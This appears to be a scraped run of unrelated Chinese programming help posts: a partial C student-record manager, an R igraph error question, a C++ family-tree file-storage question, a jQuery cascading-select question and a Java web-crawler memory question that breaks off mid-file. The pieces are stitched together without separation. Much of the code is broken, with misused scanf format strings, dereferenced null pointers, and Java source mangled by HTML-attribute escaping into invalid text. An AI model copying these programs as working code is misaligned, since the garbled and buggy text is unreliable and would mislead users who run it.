printf("%-20s%-10s%-5s%-4d%-20s%-20s%-20s%-15d%\n","学生学号","学生姓名","学生性别","学生年龄","学生籍贯","学生系别","学生专业","学生班级"); printf("%-20s%-10s%-5s%-4d%-20s%-20s%-20s%-15d%\n", /* 输出信息 */ student.number,student.name,student.sex,student.age,student.place,student.department,student.major,student.classnumber); printf("输入更改后的数据:\n"); printf("学生学号:"); scanf("%s,student.number"); /* 输入学号 */ printf("学生姓名:"); scanf("%s,student.name"); /* 输入姓名 */ printf("学生性别:"); scanf("%s,student.sex"); /* 输入性别 */ printf("学生年龄:"); scanf("%d,student.age"); /* 输入年龄 */ printf("学生籍贯:"); scanf("%s,student.place"); /* 输入籍贯 */ printf("学生系别"); scanf("%s,student.department"); /* 输入系别 */ printf("学生专业:"); scanf("%s,student.major"); /*输入专业 */ printf("学生班级:"); scanf("%d,student.classnumber"); /* 输入班级 fseek(fp,-sizeof(StudentType), SEEK_CUR); /* 移动文件内部指针 */ fwrite(&student, sizeof(StudentType),1,fp); /* 写入数据 */ } else { /* 查询失败 */ printf("无此编号的学生!\n"); clearerr(fp); /* 清除文件结束标志 */ } } void SearchData(void) { StudentType student; /* 查询数据 */ int select; /* 工作变量 */ char number[20]; /* 学号 */ char major[20]; /* 专业 */ printf("请选择:\n"); printf("1.按学号查询 2.按专业查询\n"); scanf("%d",&select); /* 输入选择 */ while (select<1||select>2) { printf("请输入1~2的数:"); /* 输入提示 */ scanf("%d,&select"); /* 输入选择 */ } switch (select) { case 1: /* 按学生学号查询 */ printf("请输入要查询的学生学号:"); scanf("%s",number); /* 输入学生的学号 */ rewind(fp); /* 使指针位置返回到文件的开头 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ while (!feof(fp)) { /* 文件未结束 */ if(strcmp(student.number,number)==0 /* 学生学号相同 */ && student.status==0 /* 数据状态正常,没有删除标志 */ )break; /* 查询成功 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ } break; case 2: printf("输入要查询的学生的专业:"); /* 按专业查询 */ scanf("%s",major); /* 输入学生专业 */ rewind(fp); /* 使指针返回文件的开头 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生的信息 */ while(!feof(fp)) { /* 文件未结束 */ if (strcmp(student.major,major)==0 /* 学生专业相同 */ && student.status==0 /* 数据状态正常,没有删除标志 */ ) break; /* 查询成功 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ } break; } if (!feof(fp)) { /* 查询成功 */ printf("%-20s%-10s%-5s%-4d%-20s%-20s%-20s%-15d%\n","学生学号","学生姓名","学生性别","学生年龄","学生籍贯","学生系别","学生专业","学生班级"); printf("%-20s%-10s%-5s%-4d%-20s%-20s%-20s%-15d%\n", /* 输出信息 */ student.number,student.name,student.sex,student.age,student.place,student.department,student.major,student.classnumber); } else { /* 查询失败 */ printf("无此专业的学生!\n"); clearerr(fp); /* 清除文件结束标志 */ } } void DeleteData(void) /* 删除数据,只作删除标志 */ { StudentType student; /* 学生 */ char number[20]; /* 学生学号 */ printf("输入要更新的学生的学号:"); scanf("%s", number); /* 输入学生的学号 */ rewind(fp); /* 使位置指针返回文件的开头 */ fread(&student, sizeof(StudentType),1,fp); /* 读入学生的信息 */ while(!feof(fp)) { /* 文件未结束 */ if (strcmp(student.number, number)==0 /* 学生的学号相同 */ && student.status==0 /* 数据状态正常,未作删除标志 */ )break; /* 查询成功 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ } if(!feof(fp)) { /* 查询成功 */ printf("被删除记录为:、n"); printf("%-20s%-10s%-5s%-4d%-20s%-20s%-20s%-15d%\n","学生学号","学生姓名","学生性别","学生年龄","学生籍贯","学生系别","学生专业","学生班级"); printf("%-20s%-10s%-5s%-4d%-20s%-20s%-20s%-15d%\n", /* 输出信息 */ student.number,student.name,student.sex,student.age,student.place,student.department,student.major,student.classnumber); student.status=1; fseek(fp,-sizeof(StudentType), SEEK_CUR); /* 移动文件内部指针 */ fwrite(&student, sizeof(StudentType),1,fp); /* 写入数据 */ } else { /* 查询失败 */ printf("无此编号的学生!\n"); clearerr(fp); /* 清除文件结束标志 */ } } void pack(void) /* 在物理上删除作有删除标记的记录 */ { StudentType student; /* 学生 */ FILE*fpTmp; /* 临时文件指针 */ if ((fpTmp=fopen("book_tmp.dat","wb"))==NULL) { /* 打开文件失败 */ printf("打开文件student_tmp.dat 失败!\n"); /* 错误信息 */ system("PAUSE"); /* 调用库函数system(),输出系统提示信息 */ exit(2); /* 退出程序 */ } rewind(fp); /* 使位置指针返回文件开头 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ while (!feof(fp)) { /* 文件未结束 */ if(student.status==0) /*数据状态正常,未作删除标志 */ fwrite(&student,sizeof(StudentType),1,fpTmp); /* 写入数据 */ fread(&student,sizeof(StudentType),1,fp); /* 继续读入图书信息 */ } fclose(fp); fclose(fpTmp); /* 关闭文件 */ remove("student.dat"); /* 删除文件 */ rename("&student_tmp.dat","student.dat"); /* 更改文件名 */ if ((fp=fopen("student.dat","rb+"))==NULL) { /* 打开 employee.dat失败 */ printf("打开文件student.dat 失败!\n"); /* 错误信息 */ system("PAUSE"); /* 调用库函数system(),输出系统提示信息 */ exit(3); /* 退出程序 */ } } #include<stdio.h> /* 标准输入输出文件包含预处理命令 */ #include<stdlib.h> /* 标准库文件包含预处理命令 */ FILE*fp; /* 定义文件指针 */ int main(void) /* 主函数main() */ { int select; /* 工作变量 */ if ((fp=fopen("student.dat","rb+"))==NULL) { /* student.dat 文件不存在 */ if ((fp=fopen("student.dat","wb+"))==NULL) { /* 打开文件失败 */ printf("打开文件student.dat失败!\n"); /* 错误信息 */ system("PAUSE"); /* 调用库函数system(),输出系统提示信息 */ exit(1); /* 退出程序 */ } } do { printf("\n请选择:\n"); printf("1.增加数据 2.修改数据 3.查找数据 4.删除数据 5.重组数据 6.退出\n"); scanf("%d",&select); /* 输入选择 */ while (select<1||select>6) { printf("请输入1~6的数:"); /* 输入提示 */ scanf("%d",&select); /* 输入选择 */ } switch(select) { case 1: AddData(); /* 增加数据 */ break; case 2: ChangeData(); /* 修改数据 */ break; case 3: SearchData(); /* 查询数据 */ break; case 4: DeleteData(); /* 删除数据,只作删除标志 */ break; case 5: pack(); /* 物理上删除作有标记的记录 */ break; } }while (select!=6); /* 选择6退出循环 */ fclose(fp); /* 关闭文件 */ system("PAUSE"); /* 调用库函数system(),输出系统提示信息 */ return 0; /* 返回值0,返回操作系统 */ }
R语言程序 自写函数 init.igraph报错
根据《R语言与网站分析》第九章中的一个程序 init.igraph 写的,与原文无误,但运行还是报错 数据我已经放进去了,执行init.igraph就报错 ![图片说明](https://img-ask.csdn.net/upload/201708/26/1503709252_545085.jpg) library(igraph) from<-c("a","a","a","a","a","b","b","b","c","c","c","d","d","d","e","e","f","f") to<-c("d","c","b","e","f","c","d","a","d","a","b","a","c","b","a","f","e","a") data<-data.frame(from=from,to=to) init.igraph<-function(data,dir=F,rem.multi=T){ labels<-union(unique(data[,1]),unique(data[,2])) ids<-1:length(labels) from<-as.character(data[,1]); to<-as.character(data[,2]) edges<-matrix(c(ids[from],ids[to]),nc=2) g<-graph.empty(directed=F) g<-add.vertices(g,length(labels)) V(g)$label=labels g<-add.edges(g,t(edges)) if(rem.multi){ E(g)$weight<-count.multiple(g) g<-simplify(g,remove.multiple=TRUE,remove.loops=TRUE,edge.attr.comb="mean") } g } ``` ```
要把结构数据以二叉树的形式储存到文件里然后能调用修改怎么做?语言是C++(求帮忙完善代码)
代码是这样,还没做完 #include<iostream> #include<cstring> #include<stdio.h> #include<stdlib.h> #include<windows.h> using namespace std; bool function(char a[],char b[]) { int n = 0; if(strlen(a)==strlen(b)) { while(a[n]!='\0' && b[n]!='\0') { if(a[n] == b[n]) n++; else return 0; } } else return 0; return 1; }//对比两个字符数组是否相等的函数 struct FamilyTree { char name[50]; int birthday; int dieday; int sex; int height; int weight; bool marriage; int edu; char prof[50]; FamilyTree *child; FamilyTree *brother; };//要储存的结构 FamilyTree searchtg(char name[50],FamilyTree *tg) { FamilyTree *n=NULL; if(function(tg->name,name))return *tg; else { if(tg->child!=NULL)*n=searchtg(name,tg->child); if((tg->brother!=NULL)&&(n==NULL))*n=searchtg(name,tg->brother); return *n; } }//在二叉树里找节点的函数 FamilyTree searchrelation(char name[50],FamilyTree *tg) { FamilyTree *n=tg->brother; FamilyTree *s=tg->child; if(function(s->name,name))return *s; if(function(n->name,name))return *n; if(tg->child!=NULL)*s=searchrelation(name,tg->child); if(tg->brother!=NULL)*n=searchrelation(name,tg->brother); if(s!=NULL)if(function(s->name,name))return *s; if(n!=NULL)if(function(n->name,name))return *n; n=NULL; return *n; }//在二叉树里找某个节点的相关节点的函数 void readinfo(FamilyTree *p) { cout<<"请输入姓名"<<endl; cin>>p->name; cout<<"请输入出生日期"<<endl; cin>>p->birthday; cout<<"请输入死亡日期(仍在世则输入0)"<<endl; cin>>p->dieday; cout<<"请输入性别(1为男0为女)"<<endl; cin>>p->sex; cout<<"请输入身高(cm)体重(kg)"<<endl; cin>>p->height; cin>>p->weight; cout<<"请输入婚姻状况(0为未婚1为已婚)"<<endl; cin>>p->marriage; cout<<"请输入学历(0为未接受教育,1为中专及以下,2为大学及大专,3为研究生,4为博士生及以上"<<endl; cin>>p->edu; cout<<"请输入职位"<<endl; cin>>p->prof; } //读数据 void showinfo(FamilyTree *p) { cout<<"姓名:"<<p->name<<endl; cout<<"性别:"; if(p->sex==1)cout<<"男"<<endl; else cout<<"女"<<endl; cout<<"出生日期:"<<p->birthday; if(p->dieday==0)cout<<" 尚在世"<<endl; else cout<<" 死亡日期:"<<p->dieday<<endl; cout<<"身高:"<<p->height<<" "<<"体重:"<<p->weight<<endl; cout<<"婚姻状况:"; if(p->marriage)cout<<"已婚"<<endl; else cout<<"未婚"<<endl; cout<<"学历:"; switch(p->edu) { case 0:cout<<"未接受教育"<<endl;break; case 1:cout<<"中专及以下"<<endl;break; case 2:cout<<"大学及大专"<<endl;break; case 3:cout<<"研究生"<<endl;break; case 4: cout<<"博士生及以上"<<endl;break; } cout<<"职位:"<<p->prof<<endl; }//展示数据 void deleteTree() { char filename[100]; scanf("%s",&filename); int i=0; while(filename[i]!='\0')i++; filename[i++]='.'; filename[i++]='d'; filename[i++]='a'; filename[i++]='t'; if(remove(filename)) printf("无法删除家谱文件 %s \n",filename); else printf("家谱文件已删除 \n"); }//删除一个文件 void add(FamilyTree *th) { FamilyTree *s,*n; int od; char name[50]; s=new FamilyTree; s->child=NULL; s->brother=NULL; readinfo(s); cin>>name; *n=searchtg(name,th); if(n!=NULL) { cout<<"请输入亲缘关系(1为加入者是兄弟姐妹,2为加入者是儿子女儿)"<<endl; cin>>od; if(od==2)n=n->child; while(n->brother!=NULL)n=n->brother; n->brother=s; } else cout<<"错误!此家谱中没有该人"<<endl; }//在二叉树上增加一个节点 void remove(FamilyTree *th) { char name[50]; cin>>name; FamilyTree *n,*s; *n=searchtg(name,th); if(n==NULL)cout<<"错误!此家谱中没有该人人!"<<endl; else { *s=searchrelation(n->name,th); if(s->child==n) { if(n->brother!=NULL)s->child=n->brother; else s->child=NULL; delete n; } if(s->brother==n) { if(n->brother!=NULL)s->brother=n->brother; else s->brother=NULL; delete n; } } }//删除二叉树上一个节点 void search(FamilyTree *th) { char name[50]; cin>>name; FamilyTree *n; *n=searchtg(name,th); if(n==NULL)cout<<"错误!此家谱中没有该人人!"<<endl; else showinfo(n); }//展示某个节点的数据 void change(FamilyTree *th) { char name[50]; int od; cin>>name; FamilyTree *n; *n=searchtg(name,th); if(n==NULL)cout<<"错误!此家谱中没有该人人!"<<endl; else { cout<<"请输入要更改的项目(1为名字,2为出生日期,3为死亡日期,4为身高,5为体重,6为结婚情况,7为教育程度,8为职位,输入0则退出)"<<endl; while(cin>>od!=0) switch(od) { case 1:{cout<<"请输入新名字"<<endl; cin>>n->name;break;} case 2:{cout<<"请输入新的出生日期"<<endl; cin>>n->birthday;break;} case 3:{cout<<"请输入死亡日期(仍在世则输入0)"<<endl; cin>>n->dieday;break;} case 4:{cout<<"请输入身高(cm)"<<endl; cin>>n->height;break;} case 5:{cout<<"请输入体重(kg)"<<endl; cin>>n->weight;break;} case 6:{cout<<"请输入婚姻状况(0为未婚1为已婚)"<<endl; cin>>n->marriage;break;} case 7:{cout<<"请输入学历(0为未接受教育,1为中专及以下,2为大学及大专,3为研究生,4为博士生及以上"<<endl; cin>>n->edu;break;} case 8:{cout<<"请输入职位"<<endl; cin>>n->prof;break;} } } }//修改某个节点的数据 void operateTree(FamilyTree *th) { int o; cout<<"请选择操作:"<<endl; cout<<"1,添加 2.删除 3.查看 4.修改"<<endl; cin>>o; switch(o) { case 1:add(th);break; case 2:remove(th);break; case 3:search(th);break; case 4:change(th);break; } }//对某个树进行操作 void operate() { int o; FamilyTree *n; char ansname[50]; cout<<"请选择操作:"<<endl; cout<<"1,添加新家谱 2.删除家谱 3.操作现有家谱"<<endl; cin>>o; switch(o) { // case 1:addTree();break; //这个是增加一个新的树,每棵树创建一1个单独的dat文件储存,文件名为根节点的name……但是我不知道怎么做 case 2:deleteTree();break; case 3: { cout<<"请输入树的祖先的名称"<<endl; cin>>name; n=getTree(name) //这个程序我没有写,要完成的功能是把对应名字的dat文件中的二叉树读出来,然后n为其根节点 operateTree(); break; } } } //未完成 int main() { operate(); } 大概就是我不知道怎么用文件储存二叉树,也不知道怎么读出来,希望大家帮帮忙
求问,如何做一个二级联动的下拉表单(select),每点击一下按钮,表单增加一行。
求问,如何做一个二级联动的下拉表单(select),每点击一下按钮,表单增加一行。我现在的问题是,表单增加后,二级联动就没有效果了。 这是html和表单元素代码 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/tab.js"></script> <script type="text/javascript" src="js/select2.js"></script> <link href="css/select2.css" rel="stylesheet"/> </style> </head> <body> <br> <table class="table" > <thead> <tr> <th>厚度</th> <th>光度</th> <th>外观</th> </tr> </thead> <tbody> <tr id="a"> <td> <div class="demo"> <div id="city_5"> <select class="prov"></select> <select class="city" disabled="disabled"></select> <select class="dist" disabled="disabled"></select> </div> </div> </td> <td><input type="" name=""></td> <td><input type="" name=""></td> </tr> </tbody> </table> <button onclick="fun()">增加一行</button> <button onclick="del()">删除一行</button> <script type="text/javascript" src="jquery.cityselect.js"></script> <script type="text/javascript"> $(function() { $("#city_5").citySelect({ url: {"citylist": [ {"p": "前端课程", "c": [{"n": "HTML5"}, {"n": "CSS3", "a": [{"s": "HTML"}, {"s": "AJAX"}]}, {"n": "JSON"}]}, {"p": "编程语言", "c": [{"n": "C"}, {"n": "C++"}, {"n": "Python"}, {"n": "PHP"}, {"n": "JAVA"}]}, {"p": "数据库", "c": [{"n": "Mysql"}, {"n": "SqlServer"}, {"n": "Oracle"}, {"n": "Mssql"}]}, ]}, prov: "", city: "", dist: "", nodata: "none" }); }); </script> </body> </html> 这是增加一行的代码 var i = 1; $(".td").each(function(){ $(this).html(i++); }) function fun(){ var $td = $("#a").clone(); //增加一行,克隆第一个对象 $(".table").append($td); var i = 1; $(".td").each(function(){ //增加一行后重新更新序号1,2,3...... $(this).html(i++); }) $("table tr:last").find(":input").val(''); //将尾行元素克隆来的保存的值清空 } function del(){ $("table tr:not(:first):not(:first):last").remove(); //移除最后一行,并且保留前两行 } 这是二级联动代码 /* Ajax 三级省市联动 http://code.ciaoca.cn/ 日期:2012-7-18 settings 参数说明 ----- url:省市数据josn文件路径 prov:默认省份 city:默认城市 dist:默认地区(县) nodata:无数据状态 required:必选项 ------------------------------ */ (function($) { $.fn.citySelect = function(settings) { if (this.length < 1) { return; } ; // 默认值 settings = $.extend({ url: "city.min.js", prov: null, city: null, dist: null, nodata: null, required: true }, settings); var box_obj = this; var prov_obj = box_obj.find(".prov"); var city_obj = box_obj.find(".city"); var dist_obj = box_obj.find(".dist"); var prov_val = settings.prov; var city_val = settings.city; var dist_val = settings.dist; var select_prehtml = (settings.required) ? "" : "<option value=''>请选择</option>"; var city_json; // 赋值市级函数 var cityStart = function() { var prov_id = prov_obj.get(0).selectedIndex; if (!settings.required) { prov_id--; } ; city_obj.empty().attr("disabled", true); dist_obj.empty().attr("disabled", true); if (prov_id < 0 || typeof (city_json.citylist[prov_id].c) == "undefined") { if (settings.nodata == "none") { city_obj.css("display", "none"); dist_obj.css("display", "none"); } else if (settings.nodata == "hidden") { city_obj.css("visibility", "hidden"); dist_obj.css("visibility", "hidden"); } ; return; } ; // 遍历赋值市级下拉列表 temp_html = select_prehtml; $.each(city_json.citylist[prov_id].c, function(i, city) { temp_html += "<option value='" + city.n + "'>" + city.n + "</option>"; }); city_obj.html(temp_html).attr("disabled", false).css({"display": "", "visibility": ""}); distStart(); }; // 赋值地区(县)函数 var distStart = function() { var prov_id = prov_obj.get(0).selectedIndex; var city_id = city_obj.get(0).selectedIndex; if (!settings.required) { prov_id--; city_id--; } ; dist_obj.empty().attr("disabled", true); if (prov_id < 0 || city_id < 0 || typeof (city_json.citylist[prov_id].c[city_id].a) == "undefined") { if (settings.nodata == "none") { dist_obj.css("display", "none"); } else if (settings.nodata == "hidden") { dist_obj.css("visibility", "hidden"); } ; return; } ; // 遍历赋值市级下拉列表 temp_html = select_prehtml; $.each(city_json.citylist[prov_id].c[city_id].a, function(i, dist) { temp_html += "<option value='" + dist.s + "'>" + dist.s + "</option>"; }); dist_obj.html(temp_html).attr("disabled", false).css({"display": "", "visibility": ""}); }; var init = function() { // 遍历赋值省份下拉列表 temp_html = select_prehtml; $.each(city_json.citylist, function(i, prov) { temp_html += "<option value='" + prov.p + "'>" + prov.p + "</option>"; }); prov_obj.html(temp_html); // 若有传入省份与市级的值,则选中。(setTimeout为兼容IE6而设置) setTimeout(function() { if (settings.prov != null) { prov_obj.val(settings.prov); cityStart(); setTimeout(function() { if (settings.city != null) { city_obj.val(settings.city); distStart(); setTimeout(function() { if (settings.dist != null) { dist_obj.val(settings.dist); } ; }, 1); } ; }, 1); } ; }, 1); // 选择省份时发生事件 prov_obj.bind("change", function() { cityStart(); }); // 选择市级时发生事件 city_obj.bind("change", function() { distStart(); }); }; // 设置省市json数据 if (typeof (settings.url) == "string") { $.getJSON(settings.url, function(json) { city_json = json; init(); }); } else { city_json = settings.url; init(); } ; }; })(jQuery);
请教一个JVM内存优化的问题
<p>自己写的一个WEB爬虫程序,程序方面的优化我自己感觉做的不错了,各种对象的使用都想办法不让内存浪费。 <br />但还是吃内存吃的很厉害 <br />我想主要的消耗在于,对于每一个爬下来的网页,都要变成String在内存中分析超链接,这个估计很大。 <br />另外对于每一个分析到的URL,都需要保存起来。 <br /><br /><br />我当前使用的内存优化参数如下 <br />-Xms1024M -Xmx1024M -Xmn512M -Xss128K -XX:+UseParallelGC -XX:ParallelGCThreads=20 -XX:+UseParallelOldGC -XX:MaxPermSize=128M -XX:NewSize=128M -XX:MaxNewSize=128M -XX:SurvivorRatio=8 <br /><br />机器内存是1G。。上面那堆参数,除了最大最小堆内存我也是不求甚解,不是非常明白我设置了什么。网上搜答案也是五花八门,希望大家能推荐一个内存优化参数的文章 <br />另外我上面设置的参数有哪些方面可以优化,或者哪些地方写的不对。 <br /><br />核心的代码我都贴到下面:(我是刚入门的菜鸟,大家别笑话我写的差哦) <br /><br />这个是主类,负责控制,那个monitor大家就当做System.out.println,其实就是</p> <pre name="code" class="java">package com.wood.core; import java.util.concurrent.*; import java.util.*; import com.wood.core.monitor.*; public class CrawlerController implements Runnable { //一个类,用来管理URL,由各抓取线程共享 private URLMap urlmap; //已成功处理URL总数 private int count; //目标完成任务总数 private int total; //管理所有的抓取线程,必要时进行关闭,由于抓取线程存在I/O读取,而I/0读取中的线程是不可中断的,需调用线程的cancel函数 private Crawler[] crawlers; //线程工厂,可以监视产生的线程工作状态 private CrawlerFactory factory; //线程数目 private int threadMax; //当前活动线程 private int threadActive; //线程执行器 private ExecutorService exec; //当系统关闭时取消 private boolean canceled; public CrawlerController(String seed) { this(seed,20,10000); } public CrawlerController(List&lt;string&gt; seeds) { this(seeds,20,10000); } public CrawlerController(String seed,int threadNum) { this(seed,threadNum,10000); } public CrawlerController(List&lt;string&gt; seeds,int threadNum) { this(seeds,threadNum,10000); } public CrawlerController(String seed,int threadNum,int total) { //初始化URLMap,保存抓取启始位置 urlmap=new URLMap(seed); init(threadNum, total); } public CrawlerController(List&lt;string&gt; seeds,int threadNum,int total) { urlmap=new URLMap(seeds); init(threadNum, total); } //构造 private void init(int threadNum,int total) { //初始完成URL总数为0 count=0; //设置目标完成总数 this.total=total; threadMax=threadNum; threadActive=threadNum; //初始化工作线程 crawlers=new Crawler[threadMax]; String id="Crawler "; for(int i=0;i&lt;threadmax;i++) crawlers[i]="new" crawler(id+(i+1),this,urlmap);="" factory="new" crawlerfactory();="" exec="Executors.newCachedThreadPool(factory);" canceled="false;" }="" 检查当前工作线程状态,并打印系统状态="" private="" boolean="" check()="" {="" if(canceled)="" return="" false;="" int="" count="getCount();" if(count=""&gt;total) { MonitorHolder.getMonitor().print("已抓取"+COUNT+"页面,完成目标任务"+total+"页面\n"); cancel(); return false; } threadActive=factory.getActive(); /*if(threadActive&lt;=0) { MonitorHolder.getMonitor().print("无活动工作线程,抓取任务提前结束\n"); cancel(); return false; }*/ MonitorHolder.getMonitor().print_status("统计信息:成功抓取"+COUNT+"页面,当前活动线程为"+threadActive+"个\n"); return true; } //结束抓取 public void cancel() { //调用每个抓取线程的离开方法 for(Crawler cw:crawlers) cw.cancel(); //销毁工厂 factory.destory(); exec.shutdownNow(); MonitorHolder.getMonitor().print("成功结束抓取工作,共抓取"+getCount()+"页面\n"); this.canceled=true; } public synchronized void count() { count++; } public synchronized int getCount() { return count; } public int getTotal() { return total; } public URLMap getMap() { return urlmap; } @Override public void run() { while(!Thread.currentThread().isInterrupted() &amp;&amp; !canceled) { try { MonitorHolder.getMonitor().print("初始化完毕\n"); MonitorHolder.getMonitor().print("开始抓取工作\n"); for(Crawler cw:crawlers) exec.execute(cw); int check_count=0; while (check()){ TimeUnit.SECONDS.sleep(5); check_count++; if(check_count==24) { //每2分钟把待处理URL队列打乱一次 urlmap.shuffle(); MonitorHolder.getMonitor().print("控制信息!!!待抓取URL顺序将打乱\n"); check_count=0; System.gc(); } } } catch (InterruptedException e) { MonitorHolder.getMonitor().print("抓取工作被中断\n"); cancel(); } } } public static void main(String[] args) { List&lt;string&gt; seeds=new ArrayList&lt;string&gt;(15); //问问的各个分类 seeds.add("http://wenwen.soso.com/"); seeds.add("http://wenwen.soso.com/z/c1879048192.htm"); seeds.add("http://wenwen.soso.com/z/c1090519040.htm"); seeds.add("http://wenwen.soso.com/z/c1627389952.htm"); seeds.add("http://wenwen.soso.com/z/c855638016.htm"); seeds.add("http://wenwen.soso.com/z/c1191182336.htm"); seeds.add("http://wenwen.soso.com/z/c1191182336.htm"); seeds.add("http://wenwen.soso.com/z/c620756992.htm"); seeds.add("http://wenwen.soso.com/z/c553648128.htm"); seeds.add("http://wenwen.soso.com/z/c385875968.htm"); seeds.add("http://wenwen.soso.com/z/c687865856.htm"); seeds.add("http://wenwen.soso.com/z/c16777216.htm"); seeds.add("http://wenwen.soso.com/z/c318767104.htm"); seeds.add("http://wenwen.soso.com/z/c150994944.htm"); seeds.add("http://wenwen.soso.com/z/c922746880.htm"); seeds.add("http://wenwen.soso.com/z/c83886080.htm"); CrawlerController controller=new CrawlerController(seeds,5,2000000); List&lt;string&gt; format=new ArrayList&lt;string&gt;(10); //问问回答问题的格式 format.add("http://wenwen.soso.com/z/q"); controller.getMap().addLimit(format); Thread thread=new Thread(controller); thread.start(); } } </pre> <p><br /></p> <pre name="code" class="java">package com.wood.core; import java.util.*; import java.util.concurrent.TimeUnit; import java.util.regex.*; import java.io.*; import java.net.*; import com.wood.core.monitor.*; public class Crawler implements Runnable { //抓取线程ID private String id; //控制器 private CrawlerController controller; //URL,供各线程共享 private URLMap urlmap; private boolean canceled; //保存抓取的网页内容,用于分析超链接 private String content; //字符集 private String charset; //匹配超链接的正则表达式 private String link_reg="&lt;a\\s+(.*?)href\\s*=\\s*\"?(.*?)[\"(\\s*?)](.*?)&gt;"; private Pattern link_pattern=Pattern.compile(link_reg,Pattern.CASE_INSENSITIVE); //匹配字符集的正则表达式 private String charset_reg="&lt;meta\\s+http-equiv=\"content-type\"\\s+content=\"text html;="" charset="(.*?)\&amp;quot;(.*?)"&gt; "; private Pattern charset_pattern=Pattern.compile(charset_reg, Pattern.CASE_INSENSITIVE); private Pattern dir_path_pattern=Pattern.compile("^\\w+$", Pattern.CASE_INSENSITIVE); //保存当前抓取的URL的主机 private String host; //生成待建立的文件夹名 private String host_path; //抓取网页的根目录 private String root_path="E:\\web"; private File root_dir=new File(root_path); //输入来自URL,输出到文件 private InputStreamReader in=null; private OutputStreamWriter out=null; //输入输出缓冲区 private char[] buf=new char[10240]; //网页内容缓冲区 private StringBuilder contentbuilder=new StringBuilder(1024*1024); //通过一个URL,下载网页内容 private void download(URL url) { in=null; out=null; //建立抓取文件 String urlfile=url.getFile(); if(urlfile.endsWith("/")) urlfile+="indexindex"; File file=new File(host_path,urlfile); File file_dir=new File(file.getParent()); if(!file_dir.exists()) file_dir.mkdirs(); MonitorHolder.getMonitor().print(id+"开始准备下载"+url.toString()+"\n"); try { //打开链接 URLConnection conn=url.openConnection(); //超时30秒 conn.setConnectTimeout(30000); conn.setDoOutput(true); //不是HTML不下载 /*String type=conn.getContentType(); if( (type==null)|| (!type.equals("text/html")) ) return;*/ //将网页内容的缓冲区清空 contentbuilder.setLength(0); in=new InputStreamReader(conn.getInputStream(),charset); out=new OutputStreamWriter(new FileOutputStream(file),charset); int len; //读取网页内容,并写入文件,保存到网页内容缓冲里面 while((len=in.read(buf, 0, 10240)) &gt;0) { out.write(buf, 0, len); //append可以减小系统损耗 contentbuilder.append(buf, 0, len); } out.flush(); //将网页内容缓冲区的内容读到content中,用于分析 content=null; content=contentbuilder.toString(); } catch (IOException e) { MonitorHolder.getMonitor().print("错误!!!"+id+"下载页面"+url.toString()+"错误\n"); } finally{ try { if(in!=null) in.close(); if(out!=null) out.close(); } catch (IOException e) { } in=null; out=null; } } public Crawler(String id,CrawlerController controller,URLMap urlmap) { this.id=id; this.controller=controller; this.urlmap=urlmap; this.charset="utf-8"; canceled=false; MonitorHolder.getMonitor().print(id+"就绪\n"); } //设置字符集,通过正则表达式获取字符集格式 //为了性能,该功能并未使用 private void setCharset() { Matcher matcher=charset_pattern.matcher(content); String CHARSET="GB2312"; if(matcher.find()) CHARSET=matcher.group(1).trim(); this.charset=CHARSET; try { content=new String(content.getBytes("GB2312"),CHARSET); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } } //从网页内容中分析超链接 private List&lt;string&gt; retrieveLinks(URL url) { List&lt;string&gt; urls=new LinkedList&lt;string&gt;(); if(content==null) return urls; Matcher matcher=link_pattern.matcher(content); String link; String host_reg="http://"+host; String host_nowww; if(host.contains("www")) host_nowww=host.substring(host.lastIndexOf("w")+2); else { host_nowww=host; } while(matcher.find()) { //通过抓取第1组的内容 link=matcher.group(2).trim().toLowerCase(); if (link.length() &lt; 1) { continue; } //网页内部链接,忽略 if (link.charAt(0) == '#') { continue; } //发送邮件链接,忽略 if (link.indexOf("mailto:") != -1) { continue; } if (link.toLowerCase().indexOf("javascript") != -1) { continue; } //分析绝对地址或相对地址 if (link.indexOf("://") == -1){ if (link.charAt(0) == '/') //处理绝对地址 link = "http://" + host+ link; else if(link.startsWith("./")) link="http://" + host+ link.substring(1); else { String file = url.getFile(); String file_path=file.substring(0, file.lastIndexOf('/')); while(link.startsWith("../")) { link=link.substring(link.indexOf("/")+1); file_path=file_path.substring(0, file_path.lastIndexOf("/")); } link="http://"+host+file_path+"/"+link; } } int index = link.indexOf('#'); if (index != -1) { link = link.substring(0, index); } if(!urlmap.testHost(link)) continue; if(!urlmap.testLimit(link)) continue; urls.add(link); } return urls; } //设置主机并建立目录 private void setHost(String host) { this.host=host; this.host_path=root_path+"\\"+host; File host_dir=new File(host_path); if(!host_dir.exists()) host_dir.mkdirs(); } @Override public void run() { if(!root_dir.exists()) root_dir.mkdirs(); while(!Thread.currentThread().isInterrupted() &amp;&amp; !canceled &amp;&amp; (controller.getCount()&lt;controller.gettotal()) )="" {="" try="" {="" 获得一个待抓取的url,如果没有可用url,则进入阻塞状态,该方法调用是线程安全的="" string="" urlstring="urlmap.getURL();" monitorholder.getmonitor().print(id+"开始抓取"+urlstring+"\n");="" 建立url="" url="" url="new" url(urlstring);="" 设置主机="" sethost(url.gethost());="" 清空网页内容,并下贼="" content="null;" download(url);="" 未下载到内容="" if(content="=null)" {="" continue;="" }="" monitorholder.getmonitor().print(id+"抓取"+urlstring+"完毕,进行解析\n");="" setcharset();="" 分析超链接="" list&lt;string=""&gt; urls=retrieveLinks(url); //将分析到的超连接加入到待抓取的URL队列中,并将成功抓取数+1 urlmap.addAll(urls); controller.count(); MonitorHolder.getMonitor().print(id+"解析"+urlstring+"完毕,共计"+urls.size()+"个超链接,开始新任务\n"); content=null; TimeUnit.SECONDS.sleep(1); } catch (InterruptedException e) { MonitorHolder.getMonitor().print(id+"被中断\n"); canceled=true; } catch (MalformedURLException e) { MonitorHolder.getMonitor().print(id+"报告:URL格式错误\n"); }catch (Exception e) { e.printStackTrace(); } } } //退出,由控制器调用,关闭所有底层I/O资源 public void cancel() { try { if(in!=null) in.close(); } catch (IOException e) { } try { if(out!=null) out.close(); } catch (IOException e) { e.printStackTrace(); } MonitorHolder.getMonitor().print(id+"停止工作\n"); canceled=true; } } </pre> <p> </p> <pre name="code" class="java">package com.wood.core; import java.net.MalformedURLException; import java.net.URL; import 